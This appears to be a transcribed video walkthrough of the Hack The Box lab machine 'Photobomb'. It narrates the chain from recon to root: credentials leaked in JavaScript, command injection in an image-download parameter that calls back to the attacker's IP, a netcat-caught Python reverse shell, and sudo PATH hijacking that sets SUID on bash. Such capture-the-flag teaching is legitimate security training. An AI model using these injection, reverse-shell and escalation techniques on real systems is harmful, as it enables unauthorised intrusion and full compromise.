Hello everyone, welcome back guys. Hope you all are doing well. This is Mohammad Badrudduja and today we are going to solve a machine from Hackthebox. The machine name is Photobomb and the difficulty level of this machine is easy. So without wasting time, let's go and we start the scan of this target with Nmap. So as always, Nmap space -s capital V for version enumeration, space -s capital C for default scripts, and the target IP which is 10.10.11.182. Fine, and I wanna save the scan results in a file named as default.nmap. So to save the time, I already ran the scan, so I will show you the scan results at default.nmap. So there are only two ports open. The port is port number 22 and port number 80. So, and here as you can see, it's showing us a domain. Okay, so I already created a record, and so that here I can open this website with the name, right? So now here it's saying welcome to your Photobomb franchisee. This state of the art web application is your gateway to this fantastic new life. Your wish is its command. So to get started, please click here, and if you see when I hover the cursor on it, on the left hand bottom corner, you can see it's giving us a endpoint which is /printer, and it's again saying this like the credentials are in your welcome page. So where is welcome page? We don't know about it, but let's go, and I'm going to open this one. So when I open it, it's asking for username and password, which we do not know. So the first thing, I will go to page source. So go and view the page source. So when we see the page source, you can see here nothing much interesting here. Source is photobomb.js. So let's see, because this is a custom file, custom JavaScript file, so I would like to see it. Let's see, before going to see that, is there anything interesting? Nothing is interesting. So just this file is interesting for me. So click on it, and here you can see we got something. There is a function in it, and it's saying Jameson pre-populate credentials for tech support as they keep forgetting them and emailing me. Okay, so it's matching the string and it's using regular expression for it. Fine, and here in the reference, it's giving us username and password to photobomb.htb/printer. That means this is the username and password, and with this username and password, it is accessing this endpoint. Fine, so this is interesting. I'm going to copy this, come back here. Let's say machine name is Photobomb, target IP is tester IP, which is my IP. So my IP is 10.10.14.174. Okay, in Nmap scan, we found only two port open, port number 22 and 80. And here we found username. So username is this, is that, and this is the password. Fine, so let's go and we try to log in. So photo is the username, come back here, paste that, and this is the password. So copy it, come back and paste it here, sign in, don't save, and we logged in. That's good. I again wanna see the page source first. Let's see if we get something interesting here too. This is the photo, what we see here, all these photos. So these are the values of it, ID and all. Okay, nothing interesting here. Just in that page, if you scroll down, you will see there are different ways to download the image with different extension, which is JPG and PNG, and with different dimensions, right? So let's try to download this. Okay, it's downloaded, but this is the picture actually. Yeah, this is the picture. Okay, here what I want to do, I already open up the burp suite, so I wanna turn on the burp proxy on my browser, and let's download another image. And here what I'm going to do is HTTP history, right? Let's download it again. And the request was the post request. It came here, but as the request is processed, it's vanished from here. So we need to turn on the intercept, and let's download the image again. And this time we get the request. So I'm going to send this request to the repeater so it does not vanish. But the thing here is, you can see there are 3 parameters. The first one is photo, where it's mentioning the name of the photo. The second parameter is file type, which is JPG, and the third parameter is dimension. So photo name is the first parameter, second is file type, and third one is these dimensions. Okay, fine. Although if you see the request headers, it seems very normal and there is not much to do. Okay, I want to right click and do intercept. I want to see the response also. Okay, so attachment, and there is a file name. Okay, and this is the file, it's too big, and that's it. Okay, nothing much, but what we will do, I'm going back to the repeater, and here let's try command injection. So here let's see, I'm going to start here Python HTTP server. So Python 3 space -m HTTP dot server on port number 80, and come back here. Let's say curl press http://10.10.14.174, and let's send this request. So it's saying 500 internal error and photo is invalid. Okay, so what I'm going to do, I'm going to Control X from here, and let's test the file type parameter, pasting here. Okay, I put here plus instead of a space. Let's try this. Fine, let's see here, and yes, we get the hit. So that means there is command injection. It's executing this command. Fine. We can test in another way. How? We can also ping our attacker control machine here, and we can start here TCP dump, and we capture the ICMP packets. So if the command executed, we will get the ping reply here. Fine. Okay, so the thing is, it's working. Now if this is working, what we can do, we can try to get the reverse shell in that way. So I'm going to revshell.com. I think this is the site. It's revshells, I think. Let me check. Google.com first, and let's see, revshells. Yeah, this one. Okay, so first of all, here it's actually nice way to generate the reverse shell payloads. 14.174, this is my IP, and let the port 9001 on which you will receive the reverse shell, right? If you are using netcat, you can keep here netcat, or if you are using poncat or powercat, whatever you want, socat, but here I'm going to use netcat, so I keep it netcat. Here you can also choose operating system, whether it's Windows or for Linux, so I'm going to choose it for Linux. The type of shell you want, like reverse shell, bind shell, or you can try MSF Venom. Okay, so here we can try this one, which is bash. But the thing here, the problem with this bash shell is this and sign, because if you see the request, so in the request, whenever it sees and sign between two parameters, it consider it the separation of two parameters. Fine. So lay of living, maybe there are Python, Ruby, or Go. So I will go first with Python, and we don't know whether netcat is there or not. Maybe netcat is there, because in Linux, many Linux flavor, Python is there and netcat is also there. So this is lengthy payload, so I will not use it. Even this is the shortest one. So let's try to use this one and come back here. I want to open a new tab and nc space hyphen nlvp 9001, listen on this port, and come back here. And now instead of curl command, I would paste that payload, and then here up to here, Control U for the URL encode, and send this request. Come back here, there is nothing, and yes, we get the reverse shell here. You can see the connection we got from 10.10.11.182, which is the target IP. Fine. And if I run id command, so we are logged in, we get the shell as wizard. Okay, so that means Python is there. Which Python 3 exactly? So Python 3 space hyphen c for the command, and I want to import module pty dot spawn /bin/bash. So it would be easy to see the prompt here. Fine. The second thing I want to do is export term is equal to xterm. Okay, now we can execute clear command too. Why? Oh, I didn't write export term is equal to xterm. Okay, so the first thing first, I want to see how many users are there. Those can run bin bash from etc/passwd file, and as you can see, we are already wizard user. There is only one user left, which is root, who can run bin bash. And also if you see the user ID, so wizard user ID is 1000 and only root user is left. So first of all, I would like to go to its home directory and ls space -la, and there is user.txt. So let's see, user.txt, and this is going to be our first flag. Fine. Now clear again, and now I will enumerate the system. So first of all, I want to see what operating system is running, what is the architecture of it. Okay, the second thing, I would see how many ports and what are the ports are open, what services are running. Okay, so there is one service regarding Ruby on port 4567 is running. Okay, we will see that in a minute. The third thing, I would like to see if this user have something running with SUID bit set. So u plus s dev/null, nothing. Okay, let's see cron tab if there is any cron job. So cron tab space -l is the command, and yes, there is some cron job configured here. So the cron job is sudo /opt/cleanup.sh. So I would like to copy that, come back here in our notes and paste it here. This is the cron job. Clear again. And one thing which is most important here is sudo space -l, which I always use. So here, as we can see, the wizard user, this wizard user can execute this bash file as root by setting environment with no password. This is the same file, right? Okay, ls space -la /opt/cleanup.sh, and we have write and execute permission, this one, because this file is created by root. The owner of this file is root, but we have read and execute permission. Okay, so let's see if we can read. I'm going to try to read this file first. Oh, come on. Clear cat /opt/cleanup.sh, and this is the file. So what exactly it's doing? This is the bash file we already know by seeing its extension. So the first thing is it's going to the home directory of wizard in the Photobomb directory, and then it is going to clean up the log file. So if it is there, it is going to perform this action, and then it is going to protect the priceless originals, and it's using the find command here. Find source image, and the type of the resource is f, means file, and the name is going to be anything having extension jpg, and then it is going to execute change own command, and again the owner of that file will be root. So that's what it's doing. So that means if we try to create this file, fake file, find fake file somewhere, and put any command here inside it, so we can try it like that. Okay, so what I'm going to do here is cd/temp, and let's create a file. So echo chmod u plus s /bin/bash and put it in a file named as find. Okay, cat find. So find file is created and we put this command inside find file so that it will set the SUID bit set on the bash, and then let's give it execution permission. Okay, now the third thing, if we see this sudo space -l, so what we need, we will execute. I'm going to copy that and come back here. Okay, so what we can do, we can execute this as sudo. Okay, but the thing is, to execute it we need to set this environment path. Okay, so here it should be environment path, copy and paste it, and within this environment path we have to set the path from where we need to look up the binaries, other binaries, like it's using find command, right? So I lost the shell here. This is a bad thing, but here we already have the request, so just send that and we should get it here. Nope. Oh, there's the problem. Okay, okay, import pty dot spawn and okay, export term is equal to xterm and clear. Okay, so let's go. I'm going to do it again. So /dev/shm, and here I'm going to say echo chmod u plus s /bin/bash and put it in a file named as find. So if I say cat find, yeah, it's there. Now give it execution permission, which is find. Fine, so ls space -la, yeah, find is there. Clear that. Now what I need to do is just say sudo, and then I will say path is equal to /dev/shm. okay, and then we need to put path here and /opt/cleanup.sh. fine, just do this. ls space -la, okay, ls space -la /bin/bash, and as you can see the SUID bit is set on bash. So what I need to do, just /bin/bash space -p, hit enter, and we are root. So who am I? I am root. Okay, you can do another thing. So instead of putting here, if I say cat find, so instead of putting here, you can just simply take a reverse shell. Okay, and you can simply just type here /bin/bash. So whenever you execute this same command, it will open a new terminal for you here as root. Fine. So if I say id, so you can say it is root, cd/root, ls space -la. So as you can see, there is root.txt. I can use clear command. Yeah, I can use clear command cat root dot text. So this is the root flag.